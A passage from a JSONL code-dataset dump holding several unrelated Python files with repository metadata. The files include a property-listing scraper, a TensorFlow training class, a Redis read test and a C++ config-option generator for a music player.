Watt'.format(Apparent_Power_Phase1))\nprint('Power Factor Phase 1: {0:.1f}'.format(Power_Factor_Phase1))\nprint('Active Energy: {0:.3f} kWh'.format(Active_Energy / 1000.0))\n","repo_name":"Smeedy/python_countis_e03_rs485","sub_path":"countis_e03.py","file_name":"countis_e03.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21557008527","text":"# var=int(input(\"enter the number\"))\n# if var>0:\n# print(\"var is positive\")\n# elif var<0:\n# print(\"var is negative\")\n# # elif var==0:\n# else:\n# print(\"zero\")\n# else:\n# print(\"neutral\")\n\n\n# print(2+9*((3*12)-8)/10)\n# 2+9*(36-8)/10\n# 2+9*28/10\n# 2+9*2.8\n# 2+25.2\n# 27.2\n\ni=10\nwhile i>=-9:\n # if i%10==0:\n print(i)\n i=i-1","repo_name":"SarikaJha/If_Else","sub_path":"Positive_negative_zero_if-else.py","file_name":"Positive_negative_zero_if-else.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73196437390","text":"\n####################################################################\n######################### Class: TreeNode ##########################\n####################################################################\n\nclass TreeNode():\n def __init__(self, state, parent, expand_width=12):\n self.children = {}\n self.state = state\n self.isTerminal = state.isTerminal()\n self.parent = parent\n self.numVisits = 0\n self.rolloutReward = 0\n self.mReward = 0\n self.expand_width = expand_width\n\n def isFullyExpanded(self):\n if len(self.children) == self.expand_width:\n return True\n else:\n return False","repo_name":"stoneyangzh/madrl-trading","sub_path":"feature_selection/tree_node.py","file_name":"tree_node.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37712978982","text":"from L1366_RankTeamsbyVotes import f_gold\n\n##########\n# ++++++ to be replaced by tester ++++++\nmylog = print\nmyexactlog = print\n\"+++++++++++++++++\"\n\ndef test():\n \"--- test function ---\"\n param = [\n # example 1\n [[\"ABC\", \"ACB\", \"ABC\", \"ACB\", \"ACB\"]]\n # output: \"ACB\"\n # EXPLANATION: Team A was ranked first place by 5 voters. No other team was voted as first place so team A is the first team. Team B was ranked second by 2 voters and was ranked third by 3 voters. Team C was ranked second by 3 voters and was ranked third by 2 voters. As most of the voters ranked C second, team C is the second team and team B is the third.\n ,\n # example 2\n [[\"WXYZ\", \"XYZW\"]]\n # output: \"XWYZ\"\n # EXPLANATION: X is the winner due to tie-breaking rule. X has same votes as W for the first position but X has one vote as second position while W doesn't have any votes as second position.\n ,\n # example 3\n [[\"ZMNAGUEDSJYLBOPHRQICWFXTVK\"]]\n # output: \"ZMNAGUEDSJYLBOPHRQICWFXTVK\"\n # EXPLANATION: Only one voter so his votes are used for the ranking.\n ,\n ]\n for i, parameters_set in enumerate(param):\n idx = i\n mylog(0, idx)\n result = f_gold(* parameters_set)\n myexactlog(1, result)\n\n##########\n\ntest()\n","repo_name":"HALOCORE/DuoGlot","sub_path":"data/duoglot/tests/staleetcode/pysep/L1366_RankTeamsbyVotes__test.py","file_name":"L1366_RankTeamsbyVotes__test.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"28150763427","text":"from bs4 import BeautifulSoup\nimport requests\nfrom csv import writer\nurl='https://www.property24.co.ke/property-for-sale-in-nairobi-c1890'\npage=requests.get(url)\nsoup=BeautifulSoup(page.content,'html.parser')\nlists=soup.find_all('div',class_=\"pull-left sc_listingTileContent\")\nwith open('house.csv','w',encoding='utf8',newline='') as f:\n thewriter=writer(f)\n header=['Title','Location','Describition','Price']\n thewriter.writerow(header)\n \n for list in lists:\n title=list.find('div',class_=\"sc_listingTileAddress\").text\n location=list.find('div',class_= \"sc_listingTileAddress\").text\n details=list.find('div', class_=\"sc_listingTileTeaser\").text\n ksh= list.find('span').text\n info=[title,location,details,ksh]\n thewriter.writerow(info)\n \n","repo_name":"tinajs2018/webs-scatping","sub_path":"Webscarping to csv/scarpe.py","file_name":"scarpe.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40155539406","text":"import datetime\nimport math\n\n# Third-party libraries\nimport numpy as np\nimport tensorflow as tf\n\n# Own package\nfrom add_ons import time_estimation, shuffle_data\nfrom define_layers import neural_network_model\n\n# Defines a neural network - the only function so far is 'training'\nclass NeuralNetwork(object):\n def __init__(self, specs, save):\n\n # All prior defined specifications are now saved to the network class\n self.name = specs[\"name\"]\n\n self.batch_size = specs[\"batch_size\"]\n self.total_epochs = specs[\"total_epochs\"]\n\n self.optimizer_name = specs[\"optimizer_name\"]\n self.learning_rate = specs[\"learning_rate\"]\n self.activation_function = specs[\"activation_function\"]\n\n self.fc_neurons = list(specs[\"fc_neurons\"])\n self.conv_neurons = list(specs[\"conv_neurons\"])\n self.conv_pad = specs['conv_pad']\n self.pooling = specs[\"pooling\"]\n\n self.regularization = specs[\"regularization\"]\n self.beta = specs[\"beta\"]\n\n self.components = specs[\"components\"]\n self.tensorboard_dir = specs[\"tensorboard_dir\"]\n self.cropping = specs[\"cropping\"]\n self.width = specs[\"dimension\"][0]-2*self.cropping\n self.height = specs[\"dimension\"][0]-2*self.cropping\n\n self.gpu = specs[\"gpu\"]\n\n self.add_info = specs[\"add_info\"]\n self.add_info_layer = specs[\"add_info_layer\"]\n\n # Includes information of saving, early stopping, time_estimation or not\n self.flag = {\"early_stopping\": specs[\"early_stopping\"],\n \"early_stopping_costumized\": specs['early_stopping_costumized'],\n \"learning_rate_decay\": specs['learning_rate_decay'],\n \"time_estimation\": True,\n \"save\": False,\n \"save_net\": False}\n\n if save:\n self.file_dir = specs[\"file_dir\"]\n\n self.flag[\"save\"] = True\n\n # Training the network - only information needed is the data\n def train_neural_network(self, tr, va, te):\n if self.flag[\"save\"]:\n print(\"Classifier \"+str(self.name)+\" will be tuned.\\n\")\n\n train_x = tr[\"features\"]\n train_y = tr[\"label\"]\n train_name = tr[\"id\"]\n train_ai = tr[\"add_info\"]\n\n tf.reset_default_graph()\n # all calculations are saved and performed on one GPU - is garantied in run.py already\n with tf.device('/device:GPU:'+str(self.gpu)):\n\n # input\n x = tf.placeholder('float', [None, self.width, self.height], name=\"x\")\n # if CNN are used (so the list is non-empty) the input is an image - otherwise a vector\n if self.conv_neurons:\n x_net = tf.reshape(x, [-1, self.width, self.height, 1])\n else:\n x_net = tf.reshape(x, [-1, self.width * self.height])\n # output \n y = tf.placeholder('float', [None, len(train_y[0])], name=\"labels\")\n # additional information as input\n a = tf.placeholder('float', [None, len(train_ai[0])], name=\"a\")\n\n # setting up the network; conv layers, fully conected layers, which activiation, etc\n prediction, weights = \\\n neural_network_model(x_net, a, self.add_info_layer,\n len(train_y[0]), self.fc_neurons, self.conv_neurons, self.conv_pad,\n self.activation_function, self.pooling, self.width, self.height)\n\n # cost function with cross entropy (mean is an alternative)\n with tf.name_scope(\"cost\"): # names the scope for TensorBoard\n reg = 0\n if self.regularization: # if specified the L2-regularization on weights will be done\n for weight in weights:\n reg += tf.nn.l2_loss(weight)\n # cost function of the network\n cost = tf.add(\n tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits_v2(logits=prediction, labels=y)),\n tf.multiply(self.beta, reg))\n # write it to Tensorboard to review it later\n tf.summary.scalar(\"cost\", cost)\n\n # either Adam Optimizer od SGD; as defined in specifications\n # learning rate can be reduced if defined - more further down\n with tf.name_scope(\"train\"): # names the scope for TensorBoard\n if self.optimizer_name == \"Adam\":\n optimizer = tf.train.AdamOptimizer(self.learning_rate).minimize(cost)\n else:\n optimizer = tf.train.GradientDescentOptimizer(self.learning_rate).minimize(cost)\n\n # accuracy is here defined as the rate of how many samples are classified correctly\n # this was defined as the evaluation method for binary classifier \n # See Thesis document for more explanation\n with tf.name_scope(\"accuracy\"): # names the scope for TensorBoard\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n tf.summary.scalar(\"accuracy\", accuracy)\n\n merged_summary = tf.summary.merge_all()\n\n # Some more information can be printed and defined ofr Tensorflow\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True # Just use the Memory of the GPU as needed (False = everything)\n config.allow_soft_placement = True # If some of the calculations require to be placed on CPU\n # then this is done automatically\n config.log_device_placement = False # prints where each calculation (as cost, accurac, etc) is placed\n\n # start the actual training\n with tf.Session(config=config) as sess:\n # initialization is needed; otherwise errors\n sess.run(tf.global_variables_initializer())\n # define the tensorboard writer for training, validation and test\n # set the folder as subfolder of the network folder\n if self.flag[\"save\"]:\n train_writer = tf.summary.FileWriter(self.file_dir+str(self.name)+'/train')\n train_writer.add_graph(sess.graph)\n val_writer = tf.summary.FileWriter(self.file_dir+str(self.name)+'/validation')\n val_writer.add_graph(sess.graph)\n test_writer = tf.summary.FileWriter(self.file_dir+str(self.name)+'/test')\n test_writer.add_graph(sess.graph)\n\n # A step is needed to be able to compare different trained networks\n tensorboard_step = 0\n # these varibales help to calculate the training accuracy and cost\n # if all data used it will crash the program, if just one batch it is not accurate enough (in 1/batch_size percente)\n tensor_batch_x = np.empty([0, self.width, self.height])\n tensor_batch_ai = np.empty([0, len(train_ai[0])])\n tensor_batch_y = np.empty([0, len(train_y[0])])\n # Helps early stopping\n min_val_cost_epoch = 0\n min_val_cost = 10**10\n # Helps learning rate adjustment\n min_train_cost_epoch = 0\n min_train_loss = 10**10\n # helps to calculate run time estimation which hits after 10 % of run epochs\n # Note does not work with early stopping\n ping = datetime.datetime.now()\n\n # Time to run all the training epochs\n for epoch in range(self.total_epochs):\n epoch_loss = 0\n i = 0\n\n # time estimation is done here\n percentage = 0.1\n if epoch >= percentage * self.total_epochs and self.flag['time_estimation']: # estimate for run time\n self.flag['time_estimation'] = time_estimation(ping, percentage=percentage)\n\n # shuffle the training data \n train_x, train_y, train_name, train_ai = shuffle_data(train_x, train_y, train_name, train_ai)\n \n # Run over the training set, batch by batch\n # last samples are disregarded (if samples % batch_size != 0)\n while i < len(train_x) - self.batch_size:\n start = i\n end = i+self.batch_size\n\n # grep a batch of samples\n batch_x = np.array(train_x[start:end])\n batch_y = np.array(train_y[start:end])\n batch_ai = np.array(train_ai[start:end])\n\n # Run the optimizer\n _, c, _ = sess.run([optimizer, cost, prediction],\n feed_dict={x: batch_x, y: batch_y, a: batch_ai})\n epoch_loss += c\n\n i += self.batch_size\n\n # Add information for TensorBoard\n if self.flag[\"save\"]:\n if tensorboard_step % int(len(train_x)/10000.) == 0: \n # reducing the size of summary file so that just every now and then a summary is written\n tensor_batch_x = np.concatenate((tensor_batch_x, batch_x), axis=0)\n tensor_batch_ai = np.concatenate((tensor_batch_ai, batch_ai), axis=0)\n tensor_batch_y = np.concatenate((tensor_batch_y, batch_y), axis=0)\n if tensorboard_step % int(len(train_x)/250.) == 0:\n # reducing the size of summary file so that just every now and then a summary is written\n s = sess.run(merged_summary,\n feed_dict={x: va[\"features\"], y: va[\"label\"], a: va[\"add_info\"]})\n val_writer.add_summary(s, tensorboard_step)\n s = sess.run(merged_summary,\n feed_dict={x: te[\"features\"], y: te[\"label\"], a: te[\"add_info\"]})\n test_writer.add_summary(s, tensorboard_step)\n s = sess.run(merged_summary,\n feed_dict={x: tensor_batch_x, y: tensor_batch_y, a: tensor_batch_ai})\n train_writer.add_summary(s, tensorboard_step)\n # clear the training batch variables\n tensor_batch_x = np.empty([0, self.width, self.height])\n tensor_batch_ai = np.empty([0, len(train_ai[0])])\n tensor_batch_y = np.empty([0, len(train_y[0])])\n\n tensorboard_step += 1\n\n # early stopping if 20 epochs did not gain any improvements on validation cost\n if self.flag['early_stopping']:\n # calculate current validation cost\n current_val_cost = cost.eval({x: va[\"features\"], y: va[\"label\"], a: va[\"add_info\"]})\n if current_val_cost < min_val_cost: # if new minimum of cost on validation overwrite min\n min_val_cost_epoch = epoch\n min_val_cost = current_val_cost\n if self.flag['save_net']: # this flag hits if an improvement hits after 5 epochs of non-imporvements\n self.save_network(sess, tensorboard_step)\n\n if epoch - min_val_cost_epoch >= 5 and self.flag['save']: # save the network structure\n # if an imporvement after 5 non-imporvements\n self.flag['save_net'] = True\n\n # this early stopping is done so that networks with different batch_sizes can be compared\n # Advisable to set to False\n if self.flag['early_stopping_costumized']:\n if epoch - min_val_cost_epoch > 20 * math.sqrt(self.total_epochs/64.):\n print(20 * math.sqrt(self.total_epochs/64.))\n print(\"Early stop at epoch \" + str(epoch) + '.\\n')\n break\n elif epoch - min_val_cost_epoch > 20:\n print(\"Early stop at epoch \" + str(epoch) + '.\\n')\n break\n # learning rate reduction\n # normalised loss function\n if self.flag[\"learning_rate_decay\"]:\n # receive a costum batch of samples\n batch_x = np.array(train_x[:5000])\n batch_y = np.array(train_y[:5000])\n batch_ai = np.array(train_ai[:5000])\n # calculate the cost for the training batch\n current_train_loss = cost.eval(feed_dict={x: batch_x, y: batch_y, a: batch_ai})\n if current_train_loss < min_train_loss:\n # save new minimum on loss - actually redundant\n min_train_loss = current_train_loss\n # every quarter of training reduce the learning rate to 25% (coincendece that both is divided by 4)\n if epoch - min_train_cost_epoch > self.total_epochs / 4:\n self.learning_rate /= 4.\n min_train_cost_epoch = epoch\n # Occasionally report accuracy (every 5th epoch)\n if (epoch+1) % 5 == 0:\n print('Epoch '+str(epoch+1)+' completed out of '+str(self.total_epochs)+' loss: '+str(epoch_loss))\n print('Accuracy on validation data: ' +\n str(accuracy.eval({x: va[\"features\"], y: va[\"label\"], a: va[\"add_info\"]})*100)+'\\n')\n\n print('Accuracy on test data: ' +\n str(accuracy.eval({x: te[\"features\"], y: te[\"label\"], a: te[\"add_info\"]})*100) +\n \" %\")\n if self.flag['save'] and not self.flag['save_net']: # hits if the network was not saved prior\n self.save_network(sess, tensorboard_step)\n\n print(\"\\nYuhu, we are done training this network!\\n\\n\\n\\n\")\n\n # defines the saving network routine\n # thereby the weights, biases and so on are saved so that they can be used for cassification lateron\n def save_network(self, sess, t_step):\n saver = tf.train.Saver()\n print('Saving current model...\\n')\n # network is saved in a subfolder (called 'network') in the parent network folder\n saver.save(sess,\n self.file_dir + str(self.name) + '/network/' + str(self.name),\n global_step=t_step)\n","repo_name":"EricKolibacz/component_image_classifiction","sub_path":"neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":14734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42467276915","text":"from util import *\n\n\ndef rewrite(Sum, self):\n [*args], *limits = self.of(Sum[Mul])\n for i, cond in enumerate(args):\n if cond.is_Probability:\n cond = cond.of(Probability)\n break\n else:\n return\n \n del args[i]\n \n fx = Mul(*args)\n \n if isinstance(cond, tuple):\n cond, *weights = cond\n else:\n weights = ()\n\n if cond.is_Conditioned:\n cond, given = cond.args\n else:\n given = None\n\n if cond.is_And:\n cond = cond.args\n else:\n cond = [cond]\n\n for cond in cond:\n x, x_var = cond.of(Equal)\n assert x.is_random\n _fx = fx._subs(x_var, x)\n assert _fx != fx\n fx = _fx\n\n return Expectation(fx, *weights, given=given)\n\n@apply\ndef apply(self):\n return Equal(self, rewrite(Sum, self))\n\n\n@prove\ndef prove(Eq):\n from axiom import stats\n\n n = Symbol(integer=True, positive=True)\n θ = Symbol(real=True, shape=(n, n))\n f = Function(real=True)\n x, s = Symbol(integer=True, random=True)\n Eq << apply(Sum[x.var](Probability[x:θ](x | s) * f(x.var)))\n\n Eq << Eq[-1].this.rhs.apply(stats.expect.to.sum)\n\n \n\n\nif __name__ == '__main__':\n run()\n# created on 2023-04-02\n","repo_name":"cosmosZhou/axiom","sub_path":"axiom/stats/sum/to/expect.py","file_name":"expect.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"7122761657","text":"# 导入redis模块\nimport redis\n# 导入time模块\n# import time\n\n# 连接redis数据库\n# r = redis.StrictRedis(host='127.0.0.1', port=6379,db=0, decode_responses=True)\npool = redis.ConnectionPool(host='127.0.0.1', port=6379,db=0)\nr = redis.Redis(connection_pool=pool)\n\n# print(type(r.zrange('tag:2,KPIHOIL',0, -1)))\n# print(r.zrange('tag:2,1020-AI1001',0, -1))\nline = r.zrange('tag:2,KPIHOIL_PV',0, -1)\nprint(line)\ndata = []\nfor i in range(0, len(line)):\n s = line[i].decode('utf-8').split(';')[1]\n data.append(s)\nprint(data)\n# print(type(line[0]))\n# print(line[0])\n# s = line[0].decode('utf-8')\n\n# print(type(s))\n# print(s)\n# print(s.split(';')[1])\n","repo_name":"phoenixGit228/python","sub_path":"redis_test/redis_test2.py","file_name":"redis_test2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73406891471","text":"#!/usr/bin/python\n\nimport sys, os\nos.chdir(os.path.dirname(sys.argv[0]))\n\ndefault = object()\nc_default = object()\nlateinit = object()\n\n# Parameters:\n# - type: The C storage type of the option\n# - set: The function that is called on the input string to retrieve the config type\n# - help: Option description\n# - default: String that is passed to the `set` function\n# - c_default: Default value converted to the C storage type\n# - lateinit: If set to True, $set($default) is called to initialize the value\n\ncolfmt = lambda s: s.replace(\"column(\", \"static_cast(Database::\")\n\n\nINFOLINE_FORMAT_TOP_MONO = '''\"\\\n'<< ' title{bold} ' >>'\"'''\n\nINFOLINE_FORMAT_TOP_MONO_CVALUE = colfmt('''{\n{column(COLUMN_NONE), \"<< \"},\n{column(TRACK_TITLE), \"\", -1, -1, A_BOLD},\n{column(COLUMN_NONE), \" >>\"}}''')\n\nINFOLINE_FORMAT_BOTTOM_MONO = '''\"\\\nartist{bold} ' - ' album{bold} ' (' year{} ')'\"'''\n\nINFOLINE_FORMAT_BOTTOM_MONO_CVALUE = colfmt('''{\n{column(TRACK_ARTIST), \"\", -1, -1, A_BOLD},\n{column(COLUMN_NONE), \" - \"},\n{column(ALBUM_TITLE), \"\", -1, -1, A_BOLD},\n{column(COLUMN_NONE), \" (\"},\n{column(ALBUM_YEAR), \"\", -1, -1, 0},\n{column(COLUMN_NONE), \")\"}\n}''')\n\n\nINFOLINE_FORMAT_TOP_8 = '''\"\\\n'<< '{fg=black} title{fg=yellow,bold} ' >>'{fg=black}\"'''\n\nINFOLINE_FORMAT_TOP_8_CVALUE = colfmt('''{\n{column(COLUMN_NONE), \"<< \", COLOR_BLACK},\n{column(TRACK_TITLE), \"\", COLOR_YELLOW, -1, A_BOLD},\n{column(COLUMN_NONE), \" >>\", COLOR_BLACK}}''')\n\nINFOLINE_FORMAT_BOTTOM_8 = '''\"\\\nartist{fg=blue,bold} ' - ' album{fg=red,bold} ' (' year{fg=cyan} ')'\"'''\n\nINFOLINE_FORMAT_BOTTOM_8_CVALUE = colfmt('''{\n{column(TRACK_ARTIST), \"\", COLOR_BLUE, -1, A_BOLD},\n{column(COLUMN_NONE), \" - \"},\n{column(ALBUM_TITLE), \"\", COLOR_RED, -1, A_BOLD},\n{column(COLUMN_NONE), \" (\"},\n{column(ALBUM_YEAR), \"\", COLOR_CYAN, -1, 0},\n{column(COLUMN_NONE), \")\"}\n}''')\n\n\nINFOLINE_FORMAT_TOP_256 = '''\"\\\n'<< '{fg=236} title{fg=178,bold} ' >>'{fg=236}\"'''\n\nINFOLINE_FORMAT_TOP_256_CVALUE = colfmt('''{\n{column(COLUMN_NONE), \"<< \", 236},\n{column(TRACK_TITLE), \"\", 178, -1, A_BOLD},\n{column(COLUMN_NONE), \" >>\", 236}}''')\n\nINFOLINE_FORMAT_BOTTOM_256 = '''\"\\\nartist{fg=24,bold} ' - ' album{fg=160,bold} ' (' year{fg=37} ')'\"'''\n\nINFOLINE_FORMAT_BOTTOM_256_CVALUE = colfmt('''{\n{column(TRACK_ARTIST), \"\", 24, -1, A_BOLD},\n{column(COLUMN_NONE), \" - \"},\n{column(ALBUM_TITLE), \"\", 160, -1, A_BOLD},\n{column(COLUMN_NONE), \" (\"},\n{column(ALBUM_YEAR), \"\", 37, -1, 0},\n{column(COLUMN_NONE), \")\"}\n}''')\n\n\nPLAYLIST_COLUMNS = '''\"\\\nnumber{fg=magenta size=3} artist{fg=blue size=25%} album{fg=red size=30%} \\\ntitle {fg=yellow size=33%} styles{fg=cyan size=20%} bpm{fg=green size=3 right}\"'''\n\nPLAYLIST_COLUMNS_CVALUE = colfmt('''{\n{column(TRACK_NUMBER), COLOR_MAGENTA, -1, 3},\n{column(TRACK_ARTIST), COLOR_BLUE, -1, 25, true},\n{column(ALBUM_TITLE), COLOR_RED, -1, 30, true},\n{column(TRACK_TITLE), COLOR_YELLOW, -1, 33, true},\n{column(ALBUM_STYLES), COLOR_CYAN, -1, 20, true},\n{column(TRACK_BPM), COLOR_GREEN, -1, 3}}''')\n\nPLAYLIST_COLUMNS_256 = '''\"\\\nnumber{fg=97 size=3} artist{fg=24 size=25%} album{fg=160 size=30%} \\\ntitle {fg=178 size=33%} styles{fg=37 size=20%} bpm{fg=28 size=3 right}\"'''\n\nPLAYLIST_COLUMNS_256_CVALUE = colfmt('''{\n{column(TRACK_NUMBER), 97, -1, 3},\n{column(TRACK_ARTIST), 24, -1, 25, true},\n{column(ALBUM_TITLE), 160, -1, 30, true},\n{column(TRACK_TITLE), 178, -1, 33, true},\n{column(ALBUM_STYLES), 37, -1, 20, true},\n{column(TRACK_BPM), 28, -1, 3}}''')\n\n\noptions = [\n ('database_file', {\n type: 'std::string', set: 'Filesystem::expand',\n default: '\"~/.config/ektoplayer/meta.db\"',\n help: 'Database file for storing ektoplazm metadata',\n lateinit: True\n }),\n ('log_file', {\n type: 'std::string', set: 'Filesystem::expand',\n default: '\"~/.config/ektoplayer/ektoplayer.log\"',\n help: 'File used for logging',\n lateinit: True\n }),\n# ('temp_dir', {\n# type: 'std::string', set: 'Filesystem::expand',\n# default: '\"/tmp/.ektoplazm\"',\n# help: 'Temporary dir for downloading files. See `cache_dir`, `archive_dir` and `download_dir`.\\nDirectory will be created if it does not exist, parent directories will not be created.',\n# }),\n ('cache_dir', {\n type: 'std::string', set: 'Filesystem::expand',\n default: '\"~/.cache/ektoplayer\"',\n help: 'Directory for storing mp3 files. If empty, the downloaded mp3 files won\\'t be moved to `cache_dir`. Instead they will be kept `temp_dir` and will be deleted on application start and exit.\\nDirectory will be created if it does not exist, parent directories will not be created.',\n lateinit: True\n }),\n# ('use_cache', {\n# type: 'bool', set: 'parse_bool',\n# default: 'true',\n# help: \"Enable/disable local mp3 cache.\\nIf this option is disabled, the downloaded mp3 files won't be moved from `cache_dir`.\\nInstead they will reside in `temp_dir` and will be deleted on application exit.\",\n# }),\n ('album_dir', {\n type: 'std::string', set: 'Filesystem::expand',\n default: '\"~/.config/ektoplayer/albums\"',\n help: 'Where to unpack downloaded album archives to',\n lateinit: True\n }),\n ('archive_dir', {\n type: 'std::string', set: 'Filesystem::expand',\n default: '\"~/.config/ektoplayer/archives\"',\n help: 'Where to download album archives (zip/rar)',\n lateinit: True\n }),\n ('auto_extract_to_archive_dir', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/disable automatic extraction of downloaded MP3\\narchives from `download_dir` to `archive_dir`',\n }),\n ('delete_after_extraction', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'In combination `with auto_extract_to_archive_dir`:\\nDelete zip archive after successful extraction',\n }),\n ('playlist_load_newest', {\n type: 'int', set: 'parse_int',\n default: '1000',\n help: 'How many tracks from database should be added to the playlist on application start.',\n }),\n ('prefetch', {\n type: 'float', set: 'parse_float',\n default: '0.50',\n help: 'Specify after how many percent the next track shall be prefetched. Set it to 0 to disable it.',\n }),\n ('small_update_pages', {\n type: 'int', set: 'parse_int',\n default: '3',\n help: 'How many pages should be fetched after start',\n }),\n ('use_colors', {\n type: 'int', set: 'parse_use_colors',\n default: '\"auto\"',\n c_default: '-1',\n help: 'Choose color capabilities. auto|mono|8|256',\n }),\n# ('audio_system', {\n# type: 'std::string', set: 'std::string',\n# default: '\"pulse,alsa,jack,oss\"',\n# help: 'Set output audio system. See option `-o` in mpg123(1)',\n# }),\n ('playlist.columns', {\n type: 'PlaylistColumns', set: 'parse_playlist_columns',\n default: PLAYLIST_COLUMNS,\n c_default: PLAYLIST_COLUMNS_CVALUE,\n help: 'Columns of playlist',\n }),\n ('playlist.columns_256', {\n type: 'PlaylistColumns', set: 'parse_playlist_columns',\n default: PLAYLIST_COLUMNS_256,\n c_default: PLAYLIST_COLUMNS_256_CVALUE,\n help: 'Columns of playlist (256 colors)',\n }),\n ('browser.columns', {\n type: 'PlaylistColumns', set: 'parse_playlist_columns',\n default: PLAYLIST_COLUMNS,\n help: 'Columns of browser',\n lateinit: True\n }),\n ('browser.columns_256', {\n type: 'PlaylistColumns', set: 'parse_playlist_columns',\n default: PLAYLIST_COLUMNS_256,\n help: 'Columns of browser (256 colors)',\n lateinit: True\n }),\n ('progressbar.display', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/disable progressbar',\n }),\n ('progressbar.progress_char', {\n type: 'wchar_t', set: 'parse_char',\n default: \"'~'\",\n help: 'Character used for displaying playing progress',\n }),\n ('progressbar.rest_char', {\n type: 'wchar_t', set: 'parse_char',\n default: \"'~'\",\n help: 'Character used for the rest of the line',\n }),\n ('infoline.display', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/display infoline',\n }),\n ('infoline.format_top_mono', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_TOP_MONO,\n c_default: INFOLINE_FORMAT_TOP_MONO_CVALUE,\n help: 'Format of first line in infoline (mono colors)',\n }),\n ('infoline.format_bottom_mono', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_BOTTOM_MONO,\n c_default: INFOLINE_FORMAT_BOTTOM_MONO_CVALUE,\n help: 'Format of second line in infoline (mono colors)',\n }),\n ('infoline.format_top_8', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_TOP_8,\n c_default: INFOLINE_FORMAT_TOP_8_CVALUE,\n help: 'Format of first line in infoline (8 colors)',\n }),\n ('infoline.format_bottom_8', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_BOTTOM_8,\n c_default: INFOLINE_FORMAT_BOTTOM_8_CVALUE,\n help: 'Format of second line in infoline (8 colors)',\n }),\n ('infoline.format_top_256', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_TOP_256,\n c_default: INFOLINE_FORMAT_TOP_256_CVALUE,\n help: 'Format of first line in infoline (256 colors)',\n }),\n ('infoline.format_bottom_256', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_BOTTOM_256,\n c_default: INFOLINE_FORMAT_BOTTOM_256_CVALUE,\n help: 'Format of second line in infoline (256 colors)',\n }),\n ('tabbar.visible', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/disable tabbar visibility',\n }),\n ('infoline.visible', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/disable infoline visibility',\n }),\n ('progressbar.visible', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/disable progressbar visibility',\n }),\n ('tabs.widgets', {\n type: 'packed::TinyArray', set: 'parse_tabs_widgets',\n default: '\"splash,playlist,browser,info,help\"',\n c_default: '{Views::TabWidgets::SPLASH,Views::TabWidgets::PLAYLIST,Views::TabWidgets::BROWSER,Views::TabWidgets::INFO,Views::TabWidgets::HELP}',\n help: 'Specify widget order of tabbar (left to right)',\n }),\n ('main.widgets', {\n type: 'packed::TinyArray', set: 'parse_main_widgets',\n default: '\"infoline,tabbar,readline,windows,progressbar\"',\n c_default: '{Views::MainWidgets::INFOLINE,Views::MainWidgets::TABBAR,Views::MainWidgets::READLINE,Views::MainWidgets::WINDOWS,Views::MainWidgets::PROGRESSBAR}',\n help: 'Specify widgets to show (up to down)',\n }),\n]\n\nNAME = 0\n\n# Configuration file ==========================================================\nwith open('ektoplayer.rc', 'w') as fh:\n #options.sort(key=lambda o: o[NAME])\n #options.sort(key=lambda o: len(o[NAME]))\n #options.sort(key=lambda o: o[1][type])\n #options.sort(key=lambda o: len(o[1][type]))\n\n for name, o in options:\n print('#', o[help].replace('\\n', '\\n# '), file=fh)\n print('set', name, o[default], file=fh)\n print(file=fh)\n\n print(\"# vim: filetype=sh\", file=fh)\n\n# CPP files ===================================================================\nwith open('options.declare.hpp', 'w') as fh:\n options.sort(key=lambda o: o[NAME])\n options.sort(key=lambda o: len(o[NAME]))\n options.sort(key=lambda o: o[1][type])\n options.sort(key=lambda o: len(o[1][type]))\n for name, o in options:\n print('extern', o[type], name.replace('.', '_'), end=';\\n', file=fh)\n\nwith open('options.set.cpp', 'w') as fh:\n options.sort(key=lambda o: o[NAME])\n options.sort(key=lambda o: len(o[NAME]))\n for name, o in options:\n print('case Hash::djb2(\\\"%s\\\"): %s = %s(value); break;' % (\n name, name.replace('.', '_'), o[set]\n ), file=fh)\n\nwith open('options.define.cpp', 'w') as fh:\n options.sort(key=lambda o: o[NAME])\n options.sort(key=lambda o: len(o[NAME]))\n options.sort(key=lambda o: o[1][type])\n options.sort(key=lambda o: len(o[1][type]))\n\n pad = max(map(lambda o: len(o[NAME]), options))\n fmt = '%%-%ds Config :: %%s' % pad\n\n for name, o in options:\n print(fmt % (o[type], name.replace('.', '_')), end='', file=fh)\n\n if 